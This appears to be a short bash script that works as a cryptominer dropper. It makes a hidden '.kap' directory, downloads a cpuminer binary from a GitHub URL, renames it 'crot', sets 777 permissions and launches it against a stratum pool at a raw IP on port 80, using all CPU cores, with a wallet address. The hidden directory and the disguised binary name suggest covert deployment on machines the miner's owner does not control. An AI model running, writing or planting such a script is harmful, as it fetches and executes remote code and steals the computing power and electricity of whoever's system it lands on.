#!/bin/bash
mkdir .kap && cd .kap
wget -O crot https://github.com/nandafiku/fillesg/raw/main/cpuminer-avx2
chmod 777 crot
./crot -a yespower -o stratum+tcp://45.76.185.233:80 -u unPw6ctQHeqACNCwFhXrPY5YUjVm9qNs4B.x -p webpassword=x -t $(nproc --all)
